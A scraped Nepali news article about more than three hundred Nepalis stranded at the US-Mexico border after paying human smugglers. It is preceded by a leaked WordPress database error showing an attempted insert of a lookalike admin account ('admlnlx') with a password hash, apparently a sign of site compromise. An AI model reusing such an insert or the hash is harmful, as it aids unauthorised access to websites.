WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE7Jvv0Xmr8NR3iYtDOCDlF09Nz9YN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-17 05:48:42', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ५ –
लाखौं रुपैयाँ खर्चेर अमेरिका हिँडेका तीन सय भन्दा बढी नेपाली अमेरिकी र मेक्सिकोको सीमामा अलपत्र परेका छन् ।
अमेरिकामा ट्रम्प प्रशासनले आप्रवासी नीतिमा कडाइ तथा मेक्सिकोसँग सीमामा पर्खाल लगाउने कार्य सुरु गरेसँगै हवाई, स्थल र जलमार्ग हुँदै मानव तस्करहरुको साथमा महिनौ लगाएर मेक्सिको पुगेका तीनसय भन्दा बढी नेपाली सीमामा अड्किएका हुन् ।
मानव तस्करहरुको पछि लागेर उनीहरु २३ महिनासम्म समय लगाएर मेक्सिको आइपुगेको अमेरिकास्थित नेपाली दूतावासले जनाएको छ । अमेरिका छिर्न उनीहरुले न्युनतम ४० देखि अधिकतम ७५ लाखसम्म खर्चेको पाइएको छ ।
अमेरिकाका लागि नेपाली राजदूत डा अर्जुन कार्कीले मेक्सिकोमा नेपालीहरु अलपत्र परेको खबर आएको र जाँचबुझ भइरहेको बताए । ‘अवैधानिक रुपमा आएकाहरुको खोजी गर्ने र बुझ्ने काम गरिरहेका छौ,’ राजदूत कार्कीले भने, ‘दूतावासले दक्षिण अमेरिकी मुलुक र अमेरिकासंग पनि सम्पर्क गरेर नेपालीको अवस्था बुझ्ने र डाटा राख्ने काम गर्न थालेको छ ।’